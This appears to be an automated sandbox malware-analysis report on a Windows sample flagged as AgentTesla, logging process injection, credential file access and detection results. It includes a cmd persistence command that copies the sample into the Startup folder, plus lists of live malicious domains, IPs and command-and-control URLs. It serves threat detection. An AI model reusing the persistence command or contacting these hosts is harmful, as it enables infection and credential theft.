                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe protection: execute and read and write
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe protection: read write
                Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread register set: target process: 7520
                Source: C:\Windows\SysWOW64\clip.exe | Thread register set: target process: unknown
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: C66008
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: A6D008
                Source: C:\Users\user\Desktop\PO# 81136575.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 49 > nul && copy "C:\Users\user\Desktop\PO# 81136575.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe" && ping 127.0.0.1 -n 49 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Process created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Process created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\sages.exe | Process created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe"
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
                Source: C:\Windows\SysWOW64\clip.exe | Process created: unknown unknown
                Source: C:\Users\user\Desktop\PO# 81136575.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 49 > nul && copy "c:\users\user\desktop\po# 81136575.exe" "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\sage.exe" && ping 127.0.0.1 -n 49 > nul && "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\sage.exe"
                Source: RAVCpl64.exe, 00000017.00000002.5957430978.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000017.00000000.2663140410.0000000000E20000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                Source: RAVCpl64.exe, 00000017.00000002.5957430978.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000017.00000000.2663140410.0000000000E20000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: RAVCpl64.exe, 00000017.00000002.5957430978.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000017.00000000.2663140410.0000000000E20000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: RAVCpl64.exe, 00000017.00000002.5957430978.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000017.00000000.2663140410.0000000000E20000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\PO# 81136575.exe | Queries volume information: C:\Users\user\Desktop\PO# 81136575.exe VolumeInformation
                Source: C:\Users\user\Desktop\PO# 81136575.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\sages.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\sages.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\sages.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\PO# 81136575.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 18.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000018.00000002.5957899892.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2731267987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000018.00000002.5957820613.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000002.6031342259.000000000FC40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\clip.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 18.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000018.00000002.5957899892.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2731267987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000018.00000002.5957820613.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000002.6031342259.000000000FC40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                ATT&CK Matrix (one column per tactic; a number in front of a technique name is the count the report attaches to that technique)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | 1 OS Credential Dumping | 3 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Valid Accounts | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 113 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | 12 Registry Run Keys / Startup Folder | 1 Valid Accounts | 1 Abuse Elevation Control Mechanism | Security Account Manager | 331 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Access Token Manipulation | 4 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 612 Process Injection | 12 Software Packing | LSA Secrets | 151 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 12 Registry Run Keys / Startup Folder | 1 Timestomp | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Masquerading | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Valid Accounts | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Access Token Manipulation | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 151 Virtualization/Sandbox Evasion | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
                Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 612 Process Injection | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
                Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | 1 Hidden Files and Directories | GUI Input Capture | Permission Groups Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service
                Behavior Graph ID: 1564715 | Sample: PO# 81136575.exe | Startdate: 28/11/2024 | Architecture: WINDOWS | Score: 100 (graph rendering not reproduced in text)

                Source | Detection | Scanner | Label | Link
                PO# 81136575.exe | 100% | Avira | TR/AVI.Agent.lusxc |
                PO# 81136575.exe | 74% | ReversingLabs | Win32.Trojan.AgentTesla |
                PO# 81136575.exe | 100% | Joe Sandbox ML | |

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | 100% | Avira | TR/AVI.Agent.lusxc |
                C:\Users\user\AppData\Local\Temp\sages.exe | 100% | Avira | TR/Agent.able |
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Local\Temp\sages.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.CrypterX |
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | 74% | ReversingLabs | Win32.Trojan.AgentTesla |

                No Antivirus matches

                No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
webredir.vip.gandi.net | 217.70.184.50 | true | false |  | high
tyai36.top | 38.47.207.120 | true | true |  | unknown
www.hubeisuizhou.net | 43.153.84.190 | true | true |  | unknown
homebizsuccess.blog | 192.185.16.209 | true | true |  | unknown
www.bashei.top | 23.225.34.75 | true | true |  | unknown
claudpinheiro.online | 84.32.84.32 | true | true |  | unknown
www.gfdgdfery.xyz | 104.21.53.93 | true | true |  | unknown
www.shedoes.top | 162.0.239.141 | true | false |  | unknown
www.1win-moldovia.fun | 172.67.149.53 | true | true |  | unknown
www.healthsolutions.top | 13.248.169.48 | true | true |  | unknown
redirect.3dns.box | 172.172.168.240 | true | true |  | unknown
www.56435.net | 172.247.159.68 | true | true |  | unknown
www.affilamark.buzz | 161.97.168.245 | true | true |  | unknown
www.slwmarketing.online | 208.91.197.27 | true | true |  | unknown
www.tekilla.wtf | unknown | unknown | true |  | unknown
www.homebizsuccess.blog | unknown | unknown | true |  | unknown
www.akravchenko.dev | unknown | unknown | true |  | unknown
www.claudpinheiro.online | unknown | unknown | true |  | unknown
www.tyai36.top | unknown | unknown | true |  | unknown
www.aflaksokna.com | unknown | unknown | true |  | unknown
www.torkstallningar.shop | unknown | unknown | true |  | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.bashei.top/wh2p/ | true | Avira URL Cloud: safe | unknown
http://www.bashei.top/wh2p/?VX=9+zt0j5vH1hwmuNu9M8ocWXwdarV/CDICdzwuxwNfU8HGUfYBmRRDoptJYgisjO2VNRkebPIiKpJv3rqkJwKZD01RYDx7edSJaNyhcvFUUhy7aDPpqjYjT4=&YDrhw=DvQP9LC050182Z3 | true | Avira URL Cloud: safe | unknown
http://www.1win-moldovia.fun/rfr1/?YDrhw=DvQP9LC050182Z3&VX=F4hOgqu9W5FpVGQoAREgTite/5iXCZQ+jfwfTHlgxAY2vkqeiMz3vCoerVdgDkzWxU8N3qFnpYIa4u2RgKwz4Zn2GG0gDMAqCr9egx1VT+K5Ui7eAt5njHk= | true | Avira URL Cloud: safe | unknown
http://www.hubeisuizhou.net/jywy/ | true | Avira URL Cloud: safe | unknown
http://www.akravchenko.dev/l1qb/ | true | Avira URL Cloud: safe | unknown
http://www.hubeisuizhou.net/jywy/?YDrhw=DvQP9LC050182Z3&VX=eSCeWRIoJNy1ChkNr9Mrph+bw9krj2HtA4M0Ycvj+4uTwHyRXe49PM8qrTbeBTFYTaFawzZELf0uMSg9ynQv9wCKXjtU0s3V3zZMSDWRvxGcx4r7U6700ik= | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search | clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://dts.gnpge.com | clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html | clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.consentmanager.net | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp | false |  | high
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2 | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.slwmarketing.online/Internet_Search_Engines.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM6 | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://purl.oenS5 | sage.exe, 0000000E.00000002.6012035049.00000000058E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://i2.cdn-image.com/__media__/pics/28903/search.png) | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2 | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.slwmarketing.online/Small_Business_Financing.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://purl.oen | PO# 81136575.exe, 00000000.00000002.1257906767.0000000005F32000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.homebizsuccess.blog | sage.exe, 0000000E.00000002.6031342259.000000000FCED000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://js.users.51.la/21851687.js | sage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmp | false |  | high
http://purl.oen=9 | sage.exe, 00000011.00000002.6049294447.00000000058A1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://homebizsuccess.blog/sn35/?VX=2Ljw85fE62irHv4CO6sOxtyqmKbvzO49yiJy4Znj95Je | sage.exe, 0000000E.00000002.6029462311.000000000F382000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000006FF2000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.slwmarketing.online/__media__/design/underconstructionnotice.php?d=slwmarketing.online | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.Slwmarketing.online | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.slwmarketing.online/Marketing_Online_Strategy.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tY | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a6.html | sage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a9.html | sage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://delivery.consentmanager.net | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp | false |  | high
http://beta.visualstudio.net/net/sdk/feedback.asp | PO# 81136575.exe, 00000000.00000002.1263148906.00000000703F1000.00000020.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
http://www.slwmarketing.online/Trade.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM6%2FRantCn63Wciee8E | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://i2.cdn-image.com/__media__/pics/28905/arrrow.png) | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://whois.gandi.net/en/results?search=akravchenko.dev | sage.exe, 0000000E.00000002.6029462311.000000000DD86000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000059F6000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.gandi.net/en/domain | sage.exe, 0000000E.00000002.6029462311.000000000DD86000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000059F6000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.homebizsuccess.blog/sn35/ | sage.exe, 0000000E.00000002.6031342259.000000000FCED000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.ecosia.org/newtab/ | clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://ac.ecosia.org/autocomplete?q= | clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmp | false |  | high
